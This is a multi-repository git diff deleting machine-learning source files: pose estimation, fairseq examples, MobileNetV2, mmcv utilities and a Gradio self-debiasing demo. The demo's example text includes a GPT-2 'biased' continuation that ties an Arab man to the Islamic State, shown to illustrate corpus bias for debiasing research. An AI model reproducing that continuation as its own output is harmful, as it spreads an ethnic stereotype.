batch['pose_motion_gt'] = coeff_gt[:, 1:, 64:70] - coeff_gt[:, :1, 64:70] #bs frame_len 6 - batch['ref'] = coeff_gt[:, 0, 64:70] #bs 6 - batch['class'] = x['class'].squeeze(0).cuda() # bs - indiv_mels= x['indiv_mels'].cuda().squeeze(0) # bs seq_len+1 80 16 - - # forward - audio_emb_list = [] - audio_emb = self.audio_encoder(indiv_mels[:, 1:, :, :].unsqueeze(2)) #bs seq_len 512 - batch['audio_emb'] = audio_emb - batch = self.netG(batch) - - pose_motion_pred = batch['pose_motion_pred'] # bs frame_len 6 - pose_gt = coeff_gt[:, 1:, 64:70].clone() # bs frame_len 6 - pose_pred = coeff_gt[:, :1, 64:70] + pose_motion_pred # bs frame_len 6 - - batch['pose_pred'] = pose_pred - batch['pose_gt'] = pose_gt - - return batch - - def test(self, x): - - batch = {} - ref = x['ref'] #bs 1 70 - batch['ref'] = x['ref'][:,0,-6:] - batch['class'] = x['class'] - bs = ref.shape[0] - - indiv_mels= x['indiv_mels'] # bs T 1 80 16 - indiv_mels_use = indiv_mels[:, 1:] # we regard the ref as the first frame - num_frames = x['num_frames'] - num_frames = int(num_frames) - 1 - - # - div = num_frames//self.seq_len - re = num_frames%self.seq_len - audio_emb_list = [] - pose_motion_pred_list = [torch.zeros(batch['ref'].unsqueeze(1).shape, dtype=batch['ref'].dtype, - device=batch['ref'].device)] - - for i in range(div): - z = torch.randn(bs, self.latent_dim).to(ref.device) - batch['z'] = z - audio_emb = self.audio_encoder(indiv_mels_use[:, i*self.seq_len:(i+1)*self.seq_len,:,:,:]) #bs seq_len 512 - batch['audio_emb'] = audio_emb - batch = self.netG.test(batch) - pose_motion_pred_list.append(batch['pose_motion_pred']) #list of bs seq_len 6 - - if re != 0: - z = torch.randn(bs, self.latent_dim).to(ref.device) - batch['z'] = z - audio_emb = self.audio_encoder(indiv_mels_use[:, -1*self.seq_len:,:,:,:]) #bs seq_len 512 - if audio_emb.shape[1] != self.seq_len: - pad_dim = self.seq_len-audio_emb.shape[1] - pad_audio_emb = audio_emb[:, :1].repeat(1, pad_dim, 1) - audio_emb = torch.cat([pad_audio_emb, 
audio_emb], 1) - batch['audio_emb'] = audio_emb - batch = self.netG.test(batch) - pose_motion_pred_list.append(batch['pose_motion_pred'][:,-1*re:,:]) - - pose_motion_pred = torch.cat(pose_motion_pred_list, dim = 1) - batch['pose_motion_pred'] = pose_motion_pred - - pose_pred = ref[:, :1, -6:] + pose_motion_pred # bs T 6 - - batch['pose_pred'] = pose_pred - return batch diff --git a/spaces/kirch/Text2Video-Zero/annotator/openpose/body.py b/spaces/kirch/Text2Video-Zero/annotator/openpose/body.py deleted file mode 100644 index 7c3cf7a388b4ac81004524e64125e383bdd455bd..0000000000000000000000000000000000000000 --- a/spaces/kirch/Text2Video-Zero/annotator/openpose/body.py +++ /dev/null @@ -1,219 +0,0 @@ -import cv2 -import numpy as np -import math -import time -from scipy.ndimage.filters import gaussian_filter -import matplotlib.pyplot as plt -import matplotlib -import torch -from torchvision import transforms - -from . import util -from .model import bodypose_model - -class Body(object): - def __init__(self, model_path): - self.model = bodypose_model() - if torch.cuda.is_available(): - self.model = self.model.cuda() - print('cuda') - model_dict = util.transfer(self.model, torch.load(model_path)) - self.model.load_state_dict(model_dict) - self.model.eval() - - def __call__(self, oriImg): - # scale_search = [0.5, 1.0, 1.5, 2.0] - scale_search = [0.5] - boxsize = 368 - stride = 8 - padValue = 128 - thre1 = 0.1 - thre2 = 0.05 - multiplier = [x * boxsize / oriImg.shape[0] for x in scale_search] - heatmap_avg = np.zeros((oriImg.shape[0], oriImg.shape[1], 19)) - paf_avg = np.zeros((oriImg.shape[0], oriImg.shape[1], 38)) - - for m in range(len(multiplier)): - scale = multiplier[m] - imageToTest = cv2.resize(oriImg, (0, 0), fx=scale, fy=scale, interpolation=cv2.INTER_CUBIC) - imageToTest_padded, pad = util.padRightDownCorner(imageToTest, stride, padValue) - im = np.transpose(np.float32(imageToTest_padded[:, :, :, np.newaxis]), (3, 2, 0, 1)) / 256 - 0.5 - im = 
np.ascontiguousarray(im) - - data = torch.from_numpy(im).float() - if torch.cuda.is_available(): - data = data.cuda() - # data = data.permute([2, 0, 1]).unsqueeze(0).float() - with torch.no_grad(): - Mconv7_stage6_L1, Mconv7_stage6_L2 = self.model(data) - Mconv7_stage6_L1 = Mconv7_stage6_L1.cpu().numpy() - Mconv7_stage6_L2 = Mconv7_stage6_L2.cpu().numpy() - - # extract outputs, resize, and remove padding - # heatmap = np.transpose(np.squeeze(net.blobs[output_blobs.keys()[1]].data), (1, 2, 0)) # output 1 is heatmaps - heatmap = np.transpose(np.squeeze(Mconv7_stage6_L2), (1, 2, 0)) # output 1 is heatmaps - heatmap = cv2.resize(heatmap, (0, 0), fx=stride, fy=stride, interpolation=cv2.INTER_CUBIC) - heatmap = heatmap[:imageToTest_padded.shape[0] - pad[2], :imageToTest_padded.shape[1] - pad[3], :] - heatmap = cv2.resize(heatmap, (oriImg.shape[1], oriImg.shape[0]), interpolation=cv2.INTER_CUBIC) - - # paf = np.transpose(np.squeeze(net.blobs[output_blobs.keys()[0]].data), (1, 2, 0)) # output 0 is PAFs - paf = np.transpose(np.squeeze(Mconv7_stage6_L1), (1, 2, 0)) # output 0 is PAFs - paf = cv2.resize(paf, (0, 0), fx=stride, fy=stride, interpolation=cv2.INTER_CUBIC) - paf = paf[:imageToTest_padded.shape[0] - pad[2], :imageToTest_padded.shape[1] - pad[3], :] - paf = cv2.resize(paf, (oriImg.shape[1], oriImg.shape[0]), interpolation=cv2.INTER_CUBIC) - - heatmap_avg += heatmap_avg + heatmap / len(multiplier) - paf_avg += + paf / len(multiplier) - - all_peaks = [] - peak_counter = 0 - - for part in range(18): - map_ori = heatmap_avg[:, :, part] - one_heatmap = gaussian_filter(map_ori, sigma=3) - - map_left = np.zeros(one_heatmap.shape) - map_left[1:, :] = one_heatmap[:-1, :] - map_right = np.zeros(one_heatmap.shape) - map_right[:-1, :] = one_heatmap[1:, :] - map_up = np.zeros(one_heatmap.shape) - map_up[:, 1:] = one_heatmap[:, :-1] - map_down = np.zeros(one_heatmap.shape) - map_down[:, :-1] = one_heatmap[:, 1:] - - peaks_binary = np.logical_and.reduce( - (one_heatmap >= 
map_left, one_heatmap >= map_right, one_heatmap >= map_up, one_heatmap >= map_down, one_heatmap > thre1)) - peaks = list(zip(np.nonzero(peaks_binary)[1], np.nonzero(peaks_binary)[0])) # note reverse - peaks_with_score = [x + (map_ori[x[1], x[0]],) for x in peaks] - peak_id = range(peak_counter, peak_counter + len(peaks)) - peaks_with_score_and_id = [peaks_with_score[i] + (peak_id[i],) for i in range(len(peak_id))] - - all_peaks.append(peaks_with_score_and_id) - peak_counter += len(peaks) - - # find connection in the specified sequence, center 29 is in the position 15 - limbSeq = [[2, 3], [2, 6], [3, 4], [4, 5], [6, 7], [7, 8], [2, 9], [9, 10], \ - [10, 11], [2, 12], [12, 13], [13, 14], [2, 1], [1, 15], [15, 17], \ - [1, 16], [16, 18], [3, 17], [6, 18]] - # the middle joints heatmap correpondence - mapIdx = [[31, 32], [39, 40], [33, 34], [35, 36], [41, 42], [43, 44], [19, 20], [21, 22], \ - [23, 24], [25, 26], [27, 28], [29, 30], [47, 48], [49, 50], [53, 54], [51, 52], \ - [55, 56], [37, 38], [45, 46]] - - connection_all = [] - special_k = [] - mid_num = 10 - - for k in range(len(mapIdx)): - score_mid = paf_avg[:, :, [x - 19 for x in mapIdx[k]]] - candA = all_peaks[limbSeq[k][0] - 1] - candB = all_peaks[limbSeq[k][1] - 1] - nA = len(candA) - nB = len(candB) - indexA, indexB = limbSeq[k] - if (nA != 0 and nB != 0): - connection_candidate = [] - for i in range(nA): - for j in range(nB): - vec = np.subtract(candB[j][:2], candA[i][:2]) - norm = math.sqrt(vec[0] * vec[0] + vec[1] * vec[1]) - norm = max(0.001, norm) - vec = np.divide(vec, norm) - - startend = list(zip(np.linspace(candA[i][0], candB[j][0], num=mid_num), \ - np.linspace(candA[i][1], candB[j][1], num=mid_num))) - - vec_x = np.array([score_mid[int(round(startend[I][1])), int(round(startend[I][0])), 0] \ - for I in range(len(startend))]) - vec_y = np.array([score_mid[int(round(startend[I][1])), int(round(startend[I][0])), 1] \ - for I in range(len(startend))]) - - score_midpts = np.multiply(vec_x, vec[0]) + 
np.multiply(vec_y, vec[1]) - score_with_dist_prior = sum(score_midpts) / len(score_midpts) + min( - 0.5 * oriImg.shape[0] / norm - 1, 0) - criterion1 = len(np.nonzero(score_midpts > thre2)[0]) > 0.8 * len(score_midpts) - criterion2 = score_with_dist_prior > 0 - if criterion1 and criterion2: - connection_candidate.append( - [i, j, score_with_dist_prior, score_with_dist_prior + candA[i][2] + candB[j][2]]) - - connection_candidate = sorted(connection_candidate, key=lambda x: x[2], reverse=True) - connection = np.zeros((0, 5)) - for c in range(len(connection_candidate)): - i, j, s = connection_candidate[c][0:3] - if (i not in connection[:, 3] and j not in connection[:, 4]): - connection = np.vstack([connection, [candA[i][3], candB[j][3], s, i, j]]) - if (len(connection) >= min(nA, nB)): - break - - connection_all.append(connection) - else: - special_k.append(k) - connection_all.append([]) - - # last number in each row is the total parts number of that person - # the second last number in each row is the score of the overall configuration - subset = -1 * np.ones((0, 20)) - candidate = np.array([item for sublist in all_peaks for item in sublist]) - - for k in range(len(mapIdx)): - if k not in special_k: - partAs = connection_all[k][:, 0] - partBs = connection_all[k][:, 1] - indexA, indexB = np.array(limbSeq[k]) - 1 - - for i in range(len(connection_all[k])): # = 1:size(temp,1) - found = 0 - subset_idx = [-1, -1] - for j in range(len(subset)): # 1:size(subset,1): - if subset[j][indexA] == partAs[i] or subset[j][indexB] == partBs[i]: - subset_idx[found] = j - found += 1 - - if found == 1: - j = subset_idx[0] - if subset[j][indexB] != partBs[i]: - subset[j][indexB] = partBs[i] - subset[j][-1] += 1 - subset[j][-2] += candidate[partBs[i].astype(int), 2] + connection_all[k][i][2] - elif found == 2: # if found 2 and disjoint, merge them - j1, j2 = subset_idx - membership = ((subset[j1] >= 0).astype(int) + (subset[j2] >= 0).astype(int))[:-2] - if len(np.nonzero(membership == 
2)[0]) == 0: # merge - subset[j1][:-2] += (subset[j2][:-2] + 1) - subset[j1][-2:] += subset[j2][-2:] - subset[j1][-2] += connection_all[k][i][2] - subset = np.delete(subset, j2, 0) - else: # as like found == 1 - subset[j1][indexB] = partBs[i] - subset[j1][-1] += 1 - subset[j1][-2] += candidate[partBs[i].astype(int), 2] + connection_all[k][i][2] - - # if find no partA in the subset, create a new subset - elif not found and k < 17: - row = -1 * np.ones(20) - row[indexA] = partAs[i] - row[indexB] = partBs[i] - row[-1] = 2 - row[-2] = sum(candidate[connection_all[k][i, :2].astype(int), 2]) + connection_all[k][i][2] - subset = np.vstack([subset, row]) - # delete some rows of subset which has few parts occur - deleteIdx = [] - for i in range(len(subset)): - if subset[i][-1] < 4 or subset[i][-2] / subset[i][-1] < 0.4: - deleteIdx.append(i) - subset = np.delete(subset, deleteIdx, axis=0) - - # subset: n*20 array, 0-17 is the index in candidate, 18 is the total score, 19 is the total parts - # candidate: x, y, score, id - return candidate, subset - -if __name__ == "__main__": - body_estimation = Body('../model/body_pose_model.pth') - - test_image = '../images/ski.jpg' - oriImg = cv2.imread(test_image) # B,G,R order - candidate, subset = body_estimation(oriImg) - canvas = util.draw_bodypose(oriImg, candidate, subset) - plt.imshow(canvas[:, :, [2, 1, 0]]) - plt.show() diff --git a/spaces/kirch/Text2Video-Zero/annotator/uniformer/mmcv/utils/path.py b/spaces/kirch/Text2Video-Zero/annotator/uniformer/mmcv/utils/path.py deleted file mode 100644 index 7dab4b3041413b1432b0f434b8b14783097d33c6..0000000000000000000000000000000000000000 --- a/spaces/kirch/Text2Video-Zero/annotator/uniformer/mmcv/utils/path.py +++ /dev/null @@ -1,101 +0,0 @@ -# Copyright (c) OpenMMLab. All rights reserved. 
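As an editorial aside on the `body.py` code above: its peak extraction (Gaussian smoothing followed by a four-neighbour local-maximum test over each part heatmap) can be sketched in isolation. This is a standalone re-implementation for illustration, not part of the original file; the function name `find_peaks` and the small test heatmap are ours.

```python
import numpy as np
from scipy.ndimage import gaussian_filter

def find_peaks(heatmap, sigma=1, thre1=0.1):
    """Sketch of the peak extraction used in body.py: smooth the part
    heatmap, then keep pixels that are >= all four axis-aligned
    neighbours and above the confidence threshold thre1."""
    smoothed = gaussian_filter(heatmap, sigma=sigma)
    left = np.zeros_like(smoothed)
    left[1:, :] = smoothed[:-1, :]
    right = np.zeros_like(smoothed)
    right[:-1, :] = smoothed[1:, :]
    up = np.zeros_like(smoothed)
    up[:, 1:] = smoothed[:, :-1]
    down = np.zeros_like(smoothed)
    down[:, :-1] = smoothed[:, 1:]
    peaks_binary = np.logical_and.reduce(
        (smoothed >= left, smoothed >= right,
         smoothed >= up, smoothed >= down, smoothed > thre1))
    ys, xs = np.nonzero(peaks_binary)
    # report (x, y, score-from-the-unsmoothed-map), as the original does
    return [(int(x), int(y), float(heatmap[y, x])) for x, y in zip(xs, ys)]
```

A single bright pixel in an otherwise empty map yields exactly one peak at that pixel, which is the behaviour the NMS loop in the original relies on.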
-import os -import os.path as osp -from pathlib import Path - -from .misc import is_str - - -def is_filepath(x): - return is_str(x) or isinstance(x, Path) - - -def fopen(filepath, *args, **kwargs): - if is_str(filepath): - return open(filepath, *args, **kwargs) - elif isinstance(filepath, Path): - return filepath.open(*args, **kwargs) - raise ValueError('`filepath` should be a string or a Path') - - -def check_file_exist(filename, msg_tmpl='file "{}" does not exist'): - if not osp.isfile(filename): - raise FileNotFoundError(msg_tmpl.format(filename)) - - -def mkdir_or_exist(dir_name, mode=0o777): - if dir_name == '': - return - dir_name = osp.expanduser(dir_name) - os.makedirs(dir_name, mode=mode, exist_ok=True) - - -def symlink(src, dst, overwrite=True, **kwargs): - if os.path.lexists(dst) and overwrite: - os.remove(dst) - os.symlink(src, dst, **kwargs) - - -def scandir(dir_path, suffix=None, recursive=False, case_sensitive=True): - """Scan a directory to find the interested files. - - Args: - dir_path (str | obj:`Path`): Path of the directory. - suffix (str | tuple(str), optional): File suffix that we are - interested in. Default: None. - recursive (bool, optional): If set to True, recursively scan the - directory. Default: False. - case_sensitive (bool, optional) : If set to False, ignore the case of - suffix. Default: True. - - Returns: - A generator for all the interested files with relative paths. 
- """ - if isinstance(dir_path, (str, Path)): - dir_path = str(dir_path) - else: - raise TypeError('"dir_path" must be a string or Path object') - - if (suffix is not None) and not isinstance(suffix, (str, tuple)): - raise TypeError('"suffix" must be a string or tuple of strings') - - if suffix is not None and not case_sensitive: - suffix = suffix.lower() if isinstance(suffix, str) else tuple( - item.lower() for item in suffix) - - root = dir_path - - def _scandir(dir_path, suffix, recursive, case_sensitive): - for entry in os.scandir(dir_path): - if not entry.name.startswith('.') and entry.is_file(): - rel_path = osp.relpath(entry.path, root) - _rel_path = rel_path if case_sensitive else rel_path.lower() - if suffix is None or _rel_path.endswith(suffix): - yield rel_path - elif recursive and os.path.isdir(entry.path): - # scan recursively if entry.path is a directory - yield from _scandir(entry.path, suffix, recursive, - case_sensitive) - - return _scandir(dir_path, suffix, recursive, case_sensitive) - - -def find_vcs_root(path, markers=('.git', )): - """Finds the root directory (including itself) of specified markers. - - Args: - path (str): Path of directory or file. - markers (list[str], optional): List of file or directory names. - - Returns: - The directory contained one of the markers or None if not found. 
- """ - if osp.isfile(path): - path = osp.dirname(path) - - prev, cur = None, osp.abspath(osp.expanduser(path)) - while cur != prev: - if any(osp.exists(osp.join(cur, marker)) for marker in markers): - return cur - prev, cur = cur, osp.split(cur)[0] - return None diff --git a/spaces/koajoel/PolyFormer/fairseq/examples/criss/download_and_preprocess_flores_test.sh b/spaces/koajoel/PolyFormer/fairseq/examples/criss/download_and_preprocess_flores_test.sh deleted file mode 100644 index ed4b390fbdee3991efeb298050e12065d7fe605b..0000000000000000000000000000000000000000 --- a/spaces/koajoel/PolyFormer/fairseq/examples/criss/download_and_preprocess_flores_test.sh +++ /dev/null @@ -1,64 +0,0 @@ -#!/bin/bash -# Copyright (c) Facebook, Inc. and its affiliates. -# All rights reserved. -# -# This source code is licensed under the license found in the -# LICENSE file in the root directory of this source tree. - -SPM_ENCODE=flores/scripts/spm_encode.py -DATA=data_tmp -SPM_MODEL=criss_checkpoints/sentence.bpe.model -DICT=criss_checkpoints/dict.txt - -download_data() { - CORPORA=$1 - URL=$2 - - if [ -f $CORPORA ]; then - echo "$CORPORA already exists, skipping download" - else - echo "Downloading $URL" - wget $URL -O $CORPORA --no-check-certificate || rm -f $CORPORA - if [ -f $CORPORA ]; then - echo "$URL successfully downloaded." - else - echo "$URL not successfully downloaded." 
- rm -f $CORPORA - fi - fi -} - -if [[ -d flores ]]; then - echo "flores already cloned" -else - git clone https://github.com/facebookresearch/flores -fi - -mkdir -p $DATA -download_data $DATA/wikipedia_en_ne_si_test_sets.tgz "https://github.com/facebookresearch/flores/raw/master/data/wikipedia_en_ne_si_test_sets.tgz" -pushd $DATA -pwd -tar -vxf wikipedia_en_ne_si_test_sets.tgz -popd - - -for lang in ne_NP si_LK; do - datadir=$DATA/${lang}-en_XX-flores - rm -rf $datadir - mkdir -p $datadir - TEST_PREFIX=$DATA/wikipedia_en_ne_si_test_sets/wikipedia.test - python $SPM_ENCODE \ - --model ${SPM_MODEL} \ - --output_format=piece \ - --inputs ${TEST_PREFIX}.${lang:0:2}-en.${lang:0:2} ${TEST_PREFIX}.${lang:0:2}-en.en \ - --outputs $datadir/test.bpe.${lang}-en_XX.${lang} $datadir/test.bpe.${lang}-en_XX.en_XX - - # binarize data - fairseq-preprocess \ - --source-lang ${lang} --target-lang en_XX \ - --testpref $datadir/test.bpe.${lang}-en_XX \ - --destdir $datadir \ - --srcdict ${DICT} \ - --joined-dictionary \ - --workers 4 -done diff --git a/spaces/koajoel/PolyFormer/fairseq/examples/linformer/linformer_src/modules/linformer_sentence_encoder.py b/spaces/koajoel/PolyFormer/fairseq/examples/linformer/linformer_src/modules/linformer_sentence_encoder.py deleted file mode 100644 index 44f7989bd863329f763aa62b78df2eb42b3084ea..0000000000000000000000000000000000000000 --- a/spaces/koajoel/PolyFormer/fairseq/examples/linformer/linformer_src/modules/linformer_sentence_encoder.py +++ /dev/null @@ -1,54 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. 
- -import math - -import torch.nn as nn -from fairseq.models.transformer import TransformerEncoder - -from .linformer_sentence_encoder_layer import LinformerTransformerEncoderLayer - - -class LinformerTransformerEncoder(TransformerEncoder): - """ - Implementation for a Bi-directional Linformer based Sentence Encoder used - in BERT/XLM style pre-trained models. - - This first computes the token embedding using the token embedding matrix, - position embeddings (if specified) and segment embeddings - (if specified). After applying the specified number of - LinformerEncoderLayers, it outputs all the internal states of the - encoder as well as the final representation associated with the first - token (usually CLS token). - - Input: - - tokens: B x T matrix representing sentences - - segment_labels: B x T matrix representing segment label for tokens - - Output: - - a tuple of the following: - - a list of internal model states used to compute the - predictions where each tensor has shape T x B x C - - sentence representation associated with first input token - in format B x C. 
- """ - - def __init__(self, args, dictionary, embed_tokens): - self.compress_layer = None - super().__init__(args, dictionary, embed_tokens) - - def build_encoder_layer(self, args): - if self.args.shared_layer_kv_compressed == 1 and self.compress_layer is None: - compress_layer = nn.Linear( - self.args.max_positions, - self.args.max_positions // self.args.compressed, - ) - # intialize parameters for compressed layer - nn.init.xavier_uniform_(compress_layer.weight, gain=1 / math.sqrt(2)) - if self.args.freeze_compress == 1: - compress_layer.weight.requires_grad = False - self.compress_layer = compress_layer - - return LinformerTransformerEncoderLayer(args, self.compress_layer) diff --git a/spaces/kquote03/lama-video-watermark-remover/models/ade20k/mobilenet.py b/spaces/kquote03/lama-video-watermark-remover/models/ade20k/mobilenet.py deleted file mode 100644 index f501266e56ee71cdf455744020f8fc1a58ec9fff..0000000000000000000000000000000000000000 --- a/spaces/kquote03/lama-video-watermark-remover/models/ade20k/mobilenet.py +++ /dev/null @@ -1,154 +0,0 @@ -""" -This MobileNetV2 implementation is modified from the following repository: -https://github.com/tonylins/pytorch-mobilenet-v2 -""" - -import torch.nn as nn -import math -from .utils import load_url -from .segm_lib.nn import SynchronizedBatchNorm2d - -BatchNorm2d = SynchronizedBatchNorm2d - - -__all__ = ['mobilenetv2'] - - -model_urls = { - 'mobilenetv2': 'http://sceneparsing.csail.mit.edu/model/pretrained_resnet/mobilenet_v2.pth.tar', -} - - -def conv_bn(inp, oup, stride): - return nn.Sequential( - nn.Conv2d(inp, oup, 3, stride, 1, bias=False), - BatchNorm2d(oup), - nn.ReLU6(inplace=True) - ) - - -def conv_1x1_bn(inp, oup): - return nn.Sequential( - nn.Conv2d(inp, oup, 1, 1, 0, bias=False), - BatchNorm2d(oup), - nn.ReLU6(inplace=True) - ) - - -class InvertedResidual(nn.Module): - def __init__(self, inp, oup, stride, expand_ratio): - super(InvertedResidual, self).__init__() - self.stride = stride - assert stride 
in [1, 2] - - hidden_dim = round(inp * expand_ratio) - self.use_res_connect = self.stride == 1 and inp == oup - - if expand_ratio == 1: - self.conv = nn.Sequential( - # dw - nn.Conv2d(hidden_dim, hidden_dim, 3, stride, 1, groups=hidden_dim, bias=False), - BatchNorm2d(hidden_dim), - nn.ReLU6(inplace=True), - # pw-linear - nn.Conv2d(hidden_dim, oup, 1, 1, 0, bias=False), - BatchNorm2d(oup), - ) - else: - self.conv = nn.Sequential( - # pw - nn.Conv2d(inp, hidden_dim, 1, 1, 0, bias=False), - BatchNorm2d(hidden_dim), - nn.ReLU6(inplace=True), - # dw - nn.Conv2d(hidden_dim, hidden_dim, 3, stride, 1, groups=hidden_dim, bias=False), - BatchNorm2d(hidden_dim), - nn.ReLU6(inplace=True), - # pw-linear - nn.Conv2d(hidden_dim, oup, 1, 1, 0, bias=False), - BatchNorm2d(oup), - ) - - def forward(self, x): - if self.use_res_connect: - return x + self.conv(x) - else: - return self.conv(x) - - -class MobileNetV2(nn.Module): - def __init__(self, n_class=1000, input_size=224, width_mult=1.): - super(MobileNetV2, self).__init__() - block = InvertedResidual - input_channel = 32 - last_channel = 1280 - interverted_residual_setting = [ - # t, c, n, s - [1, 16, 1, 1], - [6, 24, 2, 2], - [6, 32, 3, 2], - [6, 64, 4, 2], - [6, 96, 3, 1], - [6, 160, 3, 2], - [6, 320, 1, 1], - ] - - # building first layer - assert input_size % 32 == 0 - input_channel = int(input_channel * width_mult) - self.last_channel = int(last_channel * width_mult) if width_mult > 1.0 else last_channel - self.features = [conv_bn(3, input_channel, 2)] - # building inverted residual blocks - for t, c, n, s in interverted_residual_setting: - output_channel = int(c * width_mult) - for i in range(n): - if i == 0: - self.features.append(block(input_channel, output_channel, s, expand_ratio=t)) - else: - self.features.append(block(input_channel, output_channel, 1, expand_ratio=t)) - input_channel = output_channel - # building last several layers - self.features.append(conv_1x1_bn(input_channel, self.last_channel)) - # make it 
nn.Sequential - self.features = nn.Sequential(*self.features) - - # building classifier - self.classifier = nn.Sequential( - nn.Dropout(0.2), - nn.Linear(self.last_channel, n_class), - ) - - self._initialize_weights() - - def forward(self, x): - x = self.features(x) - x = x.mean(3).mean(2) - x = self.classifier(x) - return x - - def _initialize_weights(self): - for m in self.modules(): - if isinstance(m, nn.Conv2d): - n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels - m.weight.data.normal_(0, math.sqrt(2. / n)) - if m.bias is not None: - m.bias.data.zero_() - elif isinstance(m, BatchNorm2d): - m.weight.data.fill_(1) - m.bias.data.zero_() - elif isinstance(m, nn.Linear): - n = m.weight.size(1) - m.weight.data.normal_(0, 0.01) - m.bias.data.zero_() - - -def mobilenetv2(pretrained=False, **kwargs): - """Constructs a MobileNet_V2 model. - - Args: - pretrained (bool): If True, returns a model pre-trained on ImageNet - """ - model = MobileNetV2(n_class=1000, **kwargs) - if pretrained: - model.load_state_dict(load_url(model_urls['mobilenetv2']), strict=False) - return model \ No newline at end of file diff --git a/spaces/kunwarsaaim/Self-Debiasing/app.py b/spaces/kunwarsaaim/Self-Debiasing/app.py deleted file mode 100644 index 932a25c8dcb95ba645f9e0b60cdc07f54dbdc523..0000000000000000000000000000000000000000 --- a/spaces/kunwarsaaim/Self-Debiasing/app.py +++ /dev/null @@ -1,60 +0,0 @@ -import torch -from modeling import GPT2Wrapper -import gradio as gr - - -DEBIASING_PREFIXES = [ - "The following text contains rude, disrespectful, or unreasonable language:\n", - "The following text contains very hateful, aggressive, disrespectful language:\n", - "The following text contains sexually explicit language:\n", - "The following text contains a threat:\n", - "The following text contains negative or hateful language targeting someone because of their identity:\n", - "The following text contains swear words, curse words, or other obscene or profane language:\n" -] - 
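For context on how bias-inducing prefixes like the `DEBIASING_PREFIXES` above get used: the self-debiasing decoding scheme this app builds on compares next-token probabilities for the plain prompt with those obtained after prepending a prefix, and suppresses tokens the prefix makes more likely. A minimal sketch of that rescaling step follows; `rescale_self_debiasing` is a hypothetical helper for illustration, not the `GPT2Wrapper` API used in this file.

```python
import numpy as np

def rescale_self_debiasing(p_plain, p_biased, decay=50.0):
    """Down-weight tokens that the bias-inducing prefix makes *more*
    likely; leave the rest untouched, then renormalise."""
    delta = p_biased - p_plain          # > 0: token encouraged by the prefix
    scale = np.where(delta > 0, np.exp(-decay * delta), 1.0)
    scores = p_plain * scale
    return scores / scores.sum()
```

With a toy three-token vocabulary, a token boosted by the toxic prefix loses almost all its mass, which is redistributed to the unaffected tokens.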
-DEBIASING_KEYWORDS = [ - "(rude) ", "(sexually explicit) ", "(hateful) ", "(aggressive) ", "(racist) ", "(threat) ", "(violent) ", "(sexist) " -] - -if torch.cuda.is_available(): - use_cuda = True -else: - use_cuda = False - -def debias(prompt, model, use_prefix, max_length=50, num_beam=3): - """ - Debiasing inference function. - :param prompt: The prompt to be debiased. - :param model: The GPT2 model. - :param max_length: The maximum length of the output sentence. - :return: The debiased output sentence. - """ - wrapper = GPT2Wrapper(model_name=str(model), use_cuda=use_cuda) - if use_prefix == 'Prefixes': - debiasing_prefixes = DEBIASING_PREFIXES - else: - debiasing_prefixes = DEBIASING_KEYWORDS - - output_text = wrapper.generate_self_debiasing([prompt], debiasing_prefixes= debiasing_prefixes,min_length=20, max_length=max_length, num_beam=num_beam,no_repeat_ngram_size=2) - output_text = output_text[0] - - debiasing_prefixes = [] - biased_text = wrapper.generate_self_debiasing([prompt], debiasing_prefixes= debiasing_prefixes,min_length=20, max_length=max_length, num_beam=num_beam,no_repeat_ngram_size=2) - biased_text = biased_text[0] - return output_text, biased_text, "

    Examples

    \n
    • Prompt: My professor is a Hispanic man
      Debiased Text: , and he's always had this weird feeling that his parents were not really there, but they were there. And then, of course, there was the whole thing about the kids, which was that they had to be there for the rest of their
      Biased Text: . He's a very good student. I'm not sure if he's really a good person, but he is very intelligent. \"I think he has a lot of respect for the people he works with. It's not like he doesn
    • Prompt: He is an Arab from the Middle East.
      Debiased Text: He has been a journalist since 2002, when he was a student at the London School of Economics. He said: \"I've always been interested in the world of politics. I've been involved in politics for many years and I'm very
      Biased Text: He is a member of the Islamic State. \"He has been in Syria for a long time. We have seen him in the past. I think he is very well-known in this country. But he has not been able to get
    " - - -demo = gr.Interface( - debias, - inputs = [gr.Textbox(), - gr.Radio(choices=['gpt2', 'gpt2-medium', 'gpt2-large', 'gpt2-xl'],value='gpt2'), - gr.Radio(choices=['Prefixes','Keywords'],value='Prefixes',label='Use Debiasing Prefixes or Keywords'), - gr.Number(value=50,label='Max output length'), - gr.Number(value=3,label='Number of beams for beam search')], - outputs = [gr.Textbox(label="Debiased text"),gr.Textbox(label="Biased text"), gr.Markdown( - value="

    Examples

    \n
    • Prompt: My professor is a Hispanic man
      Debiased Text: , and he's always had this weird feeling that his parents were not really there, but they were there. And then, of course, there was the whole thing about the kids, which was that they had to be there for the rest of their
      Biased Text: . He's a very good student. I'm not sure if he's really a good person, but he is very intelligent. \"I think he has a lot of respect for the people he works with. It's not like he doesn
    • Prompt: He is an Arab from the Middle East.
      Debiased Text: He has been a journalist since 2002, when he was a student at the London School of Economics. He said: \"I've always been interested in the world of politics. I've been involved in politics for many years and I'm very
      Biased Text: He is a member of the Islamic State. \"He has been in Syria for a long time. We have seen him in the past. I think he is very well-known in this country. But he has not been able to get
    ")], - description = 'Self-Diagnosis and Self-Debiasing: A Proposal for Reducing Corpus-Based Bias in NLP' - ) -if __name__ == '__main__': - - demo.launch() \ No newline at end of file diff --git a/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/fontTools/misc/etree.py b/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/fontTools/misc/etree.py deleted file mode 100644 index 9d4a65c36014c8381306968c69432f50f0c0b886..0000000000000000000000000000000000000000 --- a/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/fontTools/misc/etree.py +++ /dev/null @@ -1,478 +0,0 @@ -"""Shim module exporting the same ElementTree API for lxml and -xml.etree backends. - -When lxml is installed, it is automatically preferred over the built-in -xml.etree module. -On Python 2.7, the cElementTree module is preferred over the pure-python -ElementTree module. - -Besides exporting a unified interface, this also defines extra functions -or subclasses built-in ElementTree classes to add features that are -only availble in lxml, like OrderedDict for attributes, pretty_print and -iterwalk. 
